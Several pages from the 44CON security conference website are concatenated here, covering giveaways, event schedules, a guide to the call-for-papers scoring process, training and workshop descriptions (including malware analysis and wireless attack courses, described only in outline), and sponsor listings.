      Last year we had Linux Kernel poetry and Yoga. This year we’re looking for lightning talks with a twist in our Lightning Talk Poetry Slam from 22:00 in Track 1. Slots are 5-15 minutes long, and should feature, either in part or in whole, some form of poetry. Haikus, Limericks and epic Rap battles are most welcome. Sign up at the front desk, then come up, either take a shot of Sourz or try a British snack and SHOW US WHAT U GOT.

      TNMOC Guided Tour Giveaway

      Proudly sponsored by F-Secure

      Following the recent prize draw for Steelcon tickets, it’s time for the next opportunity to win with 44CON.

      F-Secure are sponsoring a guided tour of The National Museum of Computing (TNMOC) which will take place on Saturday 1st September from 12:30.

      The tour will last around 2 hours and cover the full museum collection, from Colossus and the wartime code-breaking machines through the history of computing from 1940 to the start of the smartphone. Much of what is on display actually works, and the guide will describe how the computers were used, tell anecdotes on their design and operation, and operate some of the equipment.

      After the tour you will be able to stay in the museum if you’d like to go back and look at certain computers. TNMOC also has a few old gaming consoles which you’ll be able to play on.

      How to enter:

      1. Sign up to our newsletter
      2. Send an email to marizel@44con.com letting us know you’re interested in the TNMOC tour. Please either use the email you used to sign up to the mailing list or mention it in your email.
      3. Keep an eye on your emails in mid August to see if you’re a winner

      Winners will be contacted around the 15th of August and the tour will take place on the 1st of September 2018. Instructions/directions will be sent to the winners prior to the tour taking place.

      Detailed information about getting to TNMOC situated in Bletchley Park can be found here.

       

      Steelcon Ticket winners

      44CON Soldering Area at Steelcon

      Steelcon is coming up soon, and Steve and Marizel are looking forward to running the soldering area on the 7th of July. We’ll be offering hands-on help for those new to soldering or who haven’t had a chance to solder in a while. So come over, say hi and have a go!

      We’ll also have some new sticker designs and a Steelcon exclusive discount code for 44CON tickets!

      And the winners are…

      After being generously provided with two Steelcon tickets to give away to 44CON supporters, last week we did a random draw. If you bought a 44CON2018 ticket and are signed up for our newsletter you had a chance to win.

      We are very happy to announce that Will Deane and Mick Vaites are the winners of the two tickets and were contacted last week.

       

       

       

      SteelCon2018 Tickets up for Grabs!

      Ey up, We’ve got two SteelCon 2018 Tickets to give away. Make like a whippet and you too could be at Sheffield’s finest hacker conference!

      Nah then, 44CON will be exhibiting at SteelCon in July 2018. We’re also running a soldering area and have stickers and reyt good goodies to grab! Even better, we have two tickets to give away! As lovely as it is, Sheffield is uphill both ways in the snow. If you’re heading up from that London, make sure you wrap up warm.

      How to enter:

      For a chance to win one of two SteelCon 2018 tickets all you have to do is this before the 31st of May 2018:

      1. Purchase a 44CON 2018 ticket
      2. Make sure you’re signed up to the 44CON mailing list (you can do this by ticking the relevant box when purchasing your ticket or here).

      Obligatory fine print:

      Don’t stress love, if you’ve already bought a ticket and are signed up to our mailing list using the same email address for both, you’re already in the draw.
      Winners will be contacted around the 4th of June 2018. If you would rather someone else had your SteelCon 2018 ticket just let us know and we’ll make it happen.
      Marizel is running the draw, and her decision is final. She cannot be bribed with crisps, breadcakes, nor flat caps, although you’re welcome to try.

      We’d love to see you at SteelCon!

      If you’re planning to attend SteelCon 2018 please come over and say hi. We’ll be the ones selling 44CON tickets, sticking things to people and soldering to our <3’s content. The SteelCon team have two 44CON 2018 tickets to give away, so look out for a chance to win these too.

      #####EOF##### 44CONnect March Week – What to expect – 44CON

      44CONnect March Week – What to expect

      We have a fantastic week planned from March 11th-14th with training, a day of talks and of course hanging out with our friends at CRESTCon. If you want to take part there’s still time, just book a seat on Rory’s course, or contact us from your early bird ticket e-mail address.

      Monday 11th March – Training

      Training opens at the Novotel London West for registration at 08:15 GMT with a 09:00 Start. Coffee and breakfast snacks will be available from 08:30. There are opportunities to break throughout the day and of course lunch is provided.

      Training tickets are available until we run out of seats or the 8th of March. There are hardly any seats left, so sales may close before the 8th. Book your seat now.

      Tuesday 12th March – Training

      Once again, doors open at 08:15 GMT. We’ll have breakfast snacks and coffee to keep you going, and lunch is provided in the restaurant.

      Wednesday 13th March – 44CONnect

      If you have an invite to 44CONnect, you’ll get an email telling you where it is. If you don’t, and want one, the easiest way is to book a seat on Rory’s course, or to email us if you’ve bought an Early Bird ticket.

      Doors open from 09:30 – 10:00 for a 10:00 start. Here’s the current schedule (subject to change):

      10:00 – Rory McCune – Container Security
      11:00 – Owen Shearing & Will Hunt – Exploiting in.security
      12:00 – Lightning talk round for attendees
      12:30 – Lunch (included for training attendees only)
      14:00 – Steve Lord – Let The Right One In: Enterprise Containerized Honeyclouds
      15:00 – Dave Ryan – Reporting is dead. Long live reporting.

      From 16:00 we’ll have an open drinks tab, then open the space up to the public from 17:00. If you don’t have an invite, drop @stevelord a DM on twitter around 16:00 and he’ll let you know where to go.

      Thursday 14th March – CRESTCon

      We’re really excited about CRESTCon. 5 lucky people won CRESTCon tickets through our competition. We’ll have a table there with a new sticker design, so come over and say hello!

      As well as tickets, we’ll be there to answer questions about our CFP, talk about training and of course, check out the talks.

      CRESTCon takes place at the Royal College of Physicians, 11 St Andrews Pl, Regent’s Park, London NW1 4LE. Tickets cost £175 and are available from the CRESTCon site.

      #####EOF##### 44connect – 44CON

      44CONnect – A 1-day invite-only event in March 2019

      44CONnect is a 1-day invite-only event taking place on the 13th of March, somewhere in London. The purpose of the day is to bring together people doing 44CON training, so they can connect with trainers and people on different courses. It’s our way of giving people who’ve attended our courses the chance to get a taste of upcoming training, and the opportunity to get some extra credit to take back to the office.

      To qualify for an invite, you need to have done one of the following:

      There are 20 tickets available, so make sure you qualify!

      Our trainers from the last two days of training will deliver talks, as well as some of those delivering courses later this year. All of our training course delegates are invited, for whom lunch will be included. Early bird ticket holders invited to the event will have to buy their own lunch, as we can’t book it for them in advance.

      There’ll be a special round of lightning talks for training delegates to deliver a short talk about something they learned on their course. Those speaking will get a small certificate of thanks that they can take back to the office.

      Drinks have been organised for the evening, but we need to be in bed early for CRESTCon the next day.

      *Early-bird ticket holders will be chosen at random throughout February, although unsubstantiated rumours abound that asking for an invite on your ticket order may drastically improve your chances…

      #####EOF##### cloud – 44CON

      Building a cloud security training platform – Pt 2: Infrastructure As Code

      This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul!

      Building an AWS and Azure security training platform

      This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

      Part 1 – Proof of Concept

      The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

      Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course? And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.


      #####EOF##### 2018 – 44CON

      More 2018 44CON Videos Added

      This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them.

      First Videos From 44CON 2018 Up

      For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts.

      #####EOF##### How to game the 44CON CFP – 44CON

      How to game the 44CON CFP

      Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

      TL;DR – I want to speak at 44CON

      Ok, then do these things to boost your chances:

      1. Submit a workshop with your talk
      2. Make it clear where else you’ve submitted and/or might/will submit
      3. Include links to other talks you’ve done, video if you have it
      4. Get your talk in early for a better chance of scoring higher
      5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

      Understanding how the CFP works

      The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

      Scoring and voting

      Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

      Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass onto those submitting on request. On average we get between 200-400 submissions a year.

      When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

      Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

      UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

      Why does it take so long to find out if I’m accepted?

      If you’re not sure what’s happening, contact us and we’ll give you an update.

      Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

      If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

      For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

      After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5. What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

      Wait, isn’t 44CON a two-track conference?

      All speakers dress like this when preparing submissions.

      Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

      Sometimes we’ll look back at the talks list and look to offer a spot to someone on the list; however, sometimes it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first served basis.

      Hacking the process

      Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

      Submit both Talks and Workshops

      We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get fewer than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

      If you want to maximise your chances of speaking at 44CON, submit a workshop.

      Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop and your main talk is about the theory, try a play-along walkthrough of how to do it in practice.

      Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

      I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

      This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

      Tell us where else your talk has been submitted

      44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

      If you’re doing your reveal in Vegas, focus on your process at 44CON.

      Not everyone in the UK can go to BlackHat or Defcon, so there’s not a massive deal in your talk being done in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of effort, but there’s an easy workaround that normally gets big bounces.

      If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

      If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

      Show us your other talks

      A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

      Show us your other talks, even if you're a rockstar.
      Showing us your other talks helps us fit you in.

      This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

      It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

      Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

      Submit your talks early in the process

      Most of the panel vote in several stages. Almost everyone votes for the first submissions coming in, and slowly dribble off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

      The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

      Remember It’s A Two-Way Street

      We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

      There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

      Coping with rejection

      Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

      If you don't hear from us straightaway, wait or contact us, don't assume your talk was rejected.
      If your talk was rejected, it’s not an indictment of you or your talk.

      To help you deal with the sting of rejection, remember this:

      1. Your talk not being accepted at 44CON does not mean we thought it was bad.
      2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
      3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

      Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

      We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.


      #####EOF##### 44CON Assistance tickets – 44CON

      44CON Assistance tickets

      Would you like to attend 44CON but don’t have the means to make it happen?

      We realise that not everyone is able to fund their own conference attendance. In partnership with our sponsors, we’ve launched an assistance program to provide the opportunity to attend 44CON to those who wouldn’t be able to come otherwise.


      We are pleased to announce that the first Assistance Sponsor for 44CON 2019, sponsoring two tickets, is Wire Security bvba. Watch this space for details of the 2019 assistance program and application process.

      The fine print:

      • Details provided for assistance ticket applications will be used for the selection process, event registration and hotel reservations in line with the 44CON Privacy Policy.
      • Assistance tickets are not transferable.
      • Attendance to the event is subject to the 44CON house rules.
      #####EOF##### DSC_4772-1 – 44CON


      #####EOF##### Malware Reverse Engineering – 44CON

      Malware Reverse Engineering

      Presented By: Joxean Koret

      This course provides effective knowledge and hands-on experience of basic malware analysis. It introduces current and relevant techniques that will prepare students to become proficient malware researchers who make heavy use of IDA Pro.

      This 2 day course will take place on the 11th & 12th March 2019 in London.
      The price is £1,300 (inc VAT). Book your place in our shop now.

      Learning Objectives

      • Understand Windows fundamentals
      • Develop reverse engineering skills
      • Gain familiarity with standard tools like IDA and Volatility
      • Reverse engineer real-world malware

      Course Outline

      Day 1:

      • Introduction to malware
      • Windows fundamentals
      • Executable file formats (PE)
      • Introduction to reverse engineering
      • Introduction
      • Tools & setting up a reverse engineering lab.
      • Brief Introduction to Graph theory
      • Static Analysis: from C to assembler
      • Manual Code reconstruction: from (any) assembler to C

      Day 2:

      • Unpacking
      • Static unpacking
      • IDAPython
      • Hands-on with various malware samples
      • Dynamic unpacking
      • Manual reconstruction
      • IDAPython batch automation
      • Memory dumping and analysis with Volatility

      Target Audience

      Security staff working in, or looking to work in blue teams on malware analysis, and those with a keen interest in reverse engineering, but without the free time dedicated to developing their skills.

      Student Requirements

      • Knows C
      • Knowledge of assembly language (x86, ARM, …) is advantageous but isn’t required

      What to Bring

      • A working laptop (no Netbooks, no Tablets, no iPads)
      • Intel Core i3 (equivalent or superior) required
      • 8GB RAM required, at a minimum
      • Wireless network card
      • 60 GB free Hard disk space
      • If you’re using a Macbook or Macbook Pro, please bring your dongles!

      Software Requirements

      • Ubuntu Linux installed either on the laptop or on a VM
      • Microsoft Windows as a VM
      • Legal version of IDA (7.0 or higher)

      Students will be provided with

      Copies of the course including all exercises and Virtual Machine images used during the course.

      About the Trainer

      LEAD INSTRUCTOR – Joxean Koret @matalaz

      Joxean Koret has been working for more than 15 years in many different computing areas. He started working as a database software developer and DBA for a number of different RDBMS.

      Afterwards he got interested in reverse engineering and applied this knowledge to the DBs he was working with, in which he has discovered dozens of vulnerabilities in products from the major database vendors, especially in Oracle software.

      He also worked in other security areas like malware analysis and anti-malware software development for an Antivirus company or developing IDA Pro at Hex-Rays.

      Book your 44CON Spring 2019 training course now!

      #####EOF##### More 2018 44CON Videos Added – 44CON

      More 2018 44CON Videos Added

      This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them.

      Matt Lorentzen and Lawrence Munro talk about how to break into a red team (no, not that way, the job way). Lots of juicy info on how to get in there and also a handy toolset for building simulated environments to hone your dark arts.

      The inimitable Kev Sheldrake returns with a talk on using the drag and drop kid’s programming language Scratch to build offensive cyber pathogens. Because why not exploit weird machines with the programming equivalent of Lego?

      Jay Harris of Digital Interruption talks about shifting left through automation and integration into development processes. Looking at different tools and techniques to automate different aspects of the process, Jay delivers a talk, which could only have more automation if he had the talk deliver itself for him.

      Leigh-Anne Galloway and Tim Yunusov closed 44CON 2018 with talks about vulnerabilities in Mobile Point of Sales systems, including those used by the 44CON bus bar. We’d buy them a drink, but according to our card bills we already had…

      David Rogers gives us some deep insight into HMG’s views of IoT Security and the UK’s Code of Practice for Security in Consumer IoT Products and Services.

      We’ll have more 2018 videos up soon. Don’t forget to subscribe to our YouTube channel to catch them as they come out!

      #####EOF##### 44CON 2019 Standard Ticket | Sense/Net

      44CON is the UK’s largest combined annual Security Conference and Training event and brings the best and brightest security speakers locally and from around the world to the UK.

      The event will start the evening of the 11th September 2019, with the Conference days on the 12th and 13th September 2019.

      We will stop the sale of Standard tickets on 6th September. After that date you will have to purchase a Late Ticket which will cost £399.00 (inc VAT).

      Standard Tickets give you access to everything and include lunch on both Thursday and Friday.

       44CON 2019 Standard Tickets are available in the following ticketing options:

      • Conference Ticket
      • Conference Ticket + exclusive design 44CON 2019 T-Shirt
      • Conference Ticket + hotel room at the IBIS
      • Conference Ticket + exclusive design 44CON 2019 T-Shirt + hotel room at the IBIS

      You can choose between 2 nights (Wednesday and Thursday) or 3 nights (Tuesday to Thursday or Wednesday to Friday, please specify at checkout), including breakfast and WiFi, at:

      • £115 per night for a single room
      • £125 per night for a double or twin room

        You can also book rooms directly with the IBIS by emailing h5623-re8@accor.com or calling +44 (0) 207 666 8551 and quoting the following code: 44CON19-ATT at the following rates:

        • £120 per night for a single room
        • £130 per night for a double or twin room

        There is a limited number of rooms available and the code will expire one month before the event so book early to avoid disappointment.

        For more information, please visit our website 44con.com.

          Conference and training tickets are non-refundable as per our Terms of Service.

          This ticket is NOT transferable. If you want a training course as well you will need to purchase one here when they become available. This ticket will be valid only for the conference on 12th to 14th September. 

           



          Type: Events
          Vendor: 44CON
          Tags: 44CON, 44CON 2019, Conference, Sense/Net, ticket

          £349.00 GBP
          #####EOF##### 44CON 2018 Workshops – 44CON

          44CON 2018 Workshops

          For a full list of 44CON 2018’s confirmed speakers, please click here.

          Bug Bounties: An introduction and path way to winning at bug bounties

          Presented by: Shubham Shah and Nathan Wakelam

          Today we finally live in a world where we can hack into a diverse range of companies, legally, whenever we want, and get paid for it!

          This workshop is primarily for pentesters wanting to learn about the entire process of participating in bug bounties and how to do it well. This workshop will help participants with the following:

          • Which company do I hack, and which platform or program is right for me?
          • How do I (better) discover assets owned by an organisation to maximise attack surface?
          • How does bug bounty hunting differ from pentesting? (while they share similarities, the methodologies for finding bugs can be vastly different)
          • How do I write a good bug bounty report? (including platform specific tips and many examples)
          • How far do I go when I find a security issue to prove its severity? (mostly based off my experience in this tricky area)
          • What should I expect from a bounty and what do they expect from me? (maintaining good relationships with bounty programs)

          (60 minute workshop)

          Windows Internals and Local Attack Surface Analysis using Powershell

          Presented by: James Forshaw

          Inspecting the internals of Microsoft Windows and discovering interesting attack surfaces for local privilege escalation can be a dark art. Outside of trivial enumeration and fuzzing of drivers there’s little documentation about how you’d find interesting privileged attack surfaces such as brokers, internal RPC/DCOM services and badly configured applications to escape sandboxes and get administrator privileges.

          In this workshop we’ll go through how to use a number of PowerShell tools such as NtObjectManager (https://www.powershellgallery.com/packages/NtObjectManager) that I’ve written to help identify interesting attack surfaces and from that extracting information through reverse engineering to discover how they can be exploited. The workshop will also contain an overview of important areas of Windows internals as they relate to privilege escalation and how PowerShell can give you a better understanding of how these internal features work together.

          Note this will be a 4 hr workshop rather than a 2 hr one.

          Orange is the new Hack: Introduction to Machine Learning with Orange

          Presented by: Philippe Arteau

          Analyzing a large number of security alerts can be repetitive and tedious. To help cope with the growing complexity of systems, analysts can use machine learning algorithms and other data analysis concepts. By doing prediction, machine learning algorithms can help prioritize and even reduce the amount of manual work needed. Data analysis can also help gain a better understanding of our data.
          The workshop will introduce participants to the world of machine learning using the software Orange. A security-related scenario will be used for the hands-on exercises. For this scenario, a large dataset of vulnerabilities from web applications reported by a static analysis tool will be used. The dataset of vulnerabilities was enriched with key metadata that will help the algorithms. Some metadata will need transformation. Based on issues that were classified, it will be possible to predict which unclassified issues are likely to be actual vulnerabilities.
          The attendants will be able to apply the same principles to the dataset in other contexts such as malware classification, system alert classification, vulnerability management, etc.

          Breaking (All) Applications With Frida

          Presented by: Jay Harris

          Frida is a framework which allows us to inject JavaScript into running applications. This has made reverse engineering and modifying applications easier than ever. Although Frida has a large following amongst mobile application testers, Frida also supports desktop applications and with not much effort it is possible to profile, debug and patch code.

          This 2 hour workshop will go through the basics of using Frida on Linux and Android and through exercises and walkthroughs show how Frida can be used to rapidly reverse engineer applications to understand logic flow, dump secrets and bypass security controls.

          Although what we look at here is relevant to mobile applications, this is not a mobile hacking workshop (in fact, most exercises will take place on Linux binaries) but might be useful to mobile testers looking to take their security testing to the next level.

          Advanced Wireless Attacks Against Enterprise Networks

          Presented by: Gabriel Ryan

          This workshop will instruct attendees on how to carry out sophisticated wireless attacks against corporate infrastructure. Attendees will learn how to attack and gain access to WPA2-Enterprise networks, bypass network access controls, and perform replay attacks to gain administrative control over an Active Directory environment. External wireless adapters and networking hardware will be provided to all workshop attendees, and material learned in the lectures will be practiced within a realistic lab environment.

          Areas of focus include:

          • Wireless reconnaissance and target identification within a red team environment
          • Attacking and gaining entry to WPA2-EAP wireless networks
          • LLMNR/NBT-NS Poisoning
          • Firewall and NAC Evasion Using Indirect Wireless Pivots
          • MITM and SMB Relay Attacks
          • Downgrading modern SSL/TLS implementations using partial HSTS bypasses

          ARM IoT Firmware Emulation Workshop

          Presented by: Saumil Shah

          Learn how to build your own testing and debugging environment for analysing IoT firmware images. Bug hunting in IoT firmware requires access to debugging, instrumentation and reverse engineering tools.

          In this workshop, we shall learn how to extract firmware from a few ARM IoT devices, deploy the extracted filesystems on an ARM QEMU environment, and emulate the firmware as close to the original hardware environment as possible. We shall also learn how to intercept and emulate NVRAM access to faithfully reproduce the exact configuration available on the actual device. Participants are required to bring a laptop capable of running VMware Workstation/Fusion/Player. We shall distribute a virtual machine with ARM QEMU along with firmware images extracted on the spot from a few SoHo routers and IP Cameras.

          The methodology discussed in this workshop is put together from the author’s own beats. While we use ARM as the base platform, the same methodology can also work for MIPS or other embedded architectures.

          Length: 2 hours
          Skill level: Intermediate

          Developing Exploits with Scratch Workshop

          Presented by: Kevin Sheldrake and Tim Todd

          Scratch is a programming language and IDE targeted at teaching young children how to code. The environment is sprite-based with all code residing behind each of the sprites and the stage (background). It is particularly good at developing games not unlike the flash-based games of the 90s/00s. Typically, the Scratch environment is a sandbox limiting all actions to objects within its own world. With the offline version of Scratch v2, however, it is possible to load ‘experimental HTTP extensions’ that can introduce new blocks linked to python functions via a web service API.

          Using the experimental extensions, I have implemented a set of blocks that allow access to TCP/IP functions. With these blocks it is possible to fuzz and exploit vulnerable services on a network-accessible victim machine. As a demonstration I have developed a PoC for the web server running on Saumil Shah’s tinysploit (stack smash) plus PoCs for two echo servers I have added to it (stack smash and format string vulnerability).

          The aim of the workshop is for students to fuzz and develop exploits against (simple) vulnerable network services. Students will be provided with a Scratch environment (VM or bootable USB stick) plus a vulnerable VM to attack. Together we will fuzz and exploit two echo servers (stack smash and format string vulnerability) through interactive investigation in gdb and interactive development in Scratch. Students will then be encouraged to fuzz and develop an exploit against the vulnerable web server provided by tinysploit.

          Upon completion of the Scratch exploits, we will quickly cover how to achieve similar results directly with python.

          If you are new to penetration testing or have been around a while but have never developed your own exploit (maybe you don’t code so well in python or C, or maybe you aren’t comfortable with debugging in gdb) then this workshop will give you the skills to build exploits in Scratch and python and see how to apply this knowledge to more complicated environments.

          Sys Mon! Why yu nuh logging dat?

          Presented by: Charl van der Walt, Willem Mouton, Carl Morris and Wicus Ross

          Sysmon from Microsoft is a very powerful host-level tracing tool, which can assist in detecting advanced threats on your network. It’s free with Windows and a native extension of the Windows stack. Sysmon performs system activity deep monitoring and logs high-confidence indicators of attacks and compromise, but in contrast to common Antivirus / HIDS solutions … it’s stable, mature, simple and FREE!

          Sysmon can monitor lots of interesting activities, including:

          • Process creation (with full command line and hashes)
          • Process termination
          • Network connections
          • File creation timestamp changes
          • Driver/image loading
          • Remote thread creation
          • Raw disk access
          • Process memory access

          and more.

          Another cool technology – Windows Event Forwarding (WEF) – can then be used to read the event log on a device and forward selected events to a Windows Event Collector (WEC) server.

          Put these two together, dump it into the SIEM, database or Elastic Stack of your choice, and you have yourself a pretty fine Windows Event monitoring and Threat Hunting platform.

          In this presentation we will introduce these powerful tools and show you how to implement WEF and deploy Sysmon using your existing AD infrastructure and Group Policy so there is minimal impact on resources, and how to remotely tune and improve the configuration as necessary.

          Win!

          So what then?

          We will then move on to explore how to extract ‘actionable’ intelligence from these logs – what to look for, how to spot it and what to do when you do find the mythical needle in the haystack, using real, practical examples from our own day-to-day operations.

          Finally, we will share in detail some of our experiments (failed and successful) with extracting even more value from these logs, for example:

          • Using Windows Event Logs via Sysmon to detect attacks on Web Applications
          • Performing Event Correlation by pulling Sysmon into MiSP
          • Using Python and scikit-learn to implement a semi-supervised learning algorithm using a Markov chain random walk classifier to highlight anomalous events from large volumes of benign ones.

          Security module for php7 – Killing bugclasses and virtual-patching the rest!

          Presented by: Julien Voisin and Thibault Koechlin

          Suhosin is a great PHP module, but unfortunately, it’s getting old, new ways have been found to compromise PHP applications, and some aren’t working anymore; and it doesn’t play well with the shiny new PHP 7. As a secure web-hosting company, we needed a reliable and future-proof solution to address the flow of new vulnerabilities that are published every day. This is why we developed Snuffleupagus, a new (and open-source!) PHP security module, that provides several features that we needed: passively killing several PHP-specific bug classes, but also implementing virtual-patching at the PHP level, allowing to patch vulnerabilities in a precise, false-positive-free, ultra-low overhead way, without even touching the applications’ code.

          Source code: https://github.com/nbs-system/snuffleupagus

          Website: https://snuffleupagus.readthedocs.io/

          Twitter: https://twitter.com/sp_php

          Also check our list of Talks for 44CON 2018.

          #####EOF##### 44CON 2016 Sponsors – 44CON

          44CON 2016 Sponsors


          Platinum Sponsor

          NCC Group

          www.nccgroup.trust

          NCC Group is a FTSE 250 listed global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape.

          With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face.

          We are passionate about making the Internet safer and revolutionising the way in which organisations think about cyber security.

          Headquartered in Manchester, UK, with over 30 offices across the world, NCC Group employs more than 1,850 people and is a trusted advisor to 15,000 clients worldwide.

           

          Gold Sponsors

          SecureWorks

          www.secureworks.com

          SecureWorks is a global provider of intelligence-driven information security solutions exclusively focused on protecting its clients from cyberattacks. SecureWorks’ solutions enable organisations to fortify their cyber defences to prevent security breaches, detect malicious activity in real time, prioritise and respond rapidly to security breaches and predict emerging threats.      


          Blackberry

          www.blackberry.com

          BlackBerry is securing a connected world, delivering innovative solutions across the entire mobile ecosystem and beyond. We secure the world’s most sensitive data across all end points – from cars to smartphones – making the mobile-first enterprise vision a reality. Founded in 1984 and based in Waterloo, Ontario, BlackBerry operates offices in North America, Europe, Middle East and Africa, Asia Pacific and Latin America. The Company trades under the ticker symbols “BB” on the Toronto Stock Exchange and “BBRY” on the NASDAQ.

          For more information, visit www.BlackBerry.com.
